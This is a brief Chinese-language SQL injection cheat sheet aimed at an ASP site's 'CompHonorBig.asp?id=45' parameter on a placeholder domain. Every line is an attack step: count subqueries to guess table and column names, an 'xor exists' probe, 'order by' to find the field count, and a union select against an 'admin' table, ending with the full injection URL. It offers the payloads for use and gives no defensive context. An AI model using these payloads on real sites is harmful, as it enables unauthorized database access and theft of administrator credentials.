目标网站；http://www.xxx.com/

可注入页面；http://www.xxx.com/CompHonorBig.asp?id=45

猜表名 and (select count(*) from 表名)>0

猜列名 and (select count(列名) from *)>0

猜表段：xor exists (select * from *)

猜字段数：order by 10  5个字段

xor 1=2 union select 1,2,3 from admin

http://www.xxx.com/CompHonorBig.asp?id=45 xor 1=2 union select 1,2,3,4,5 from admin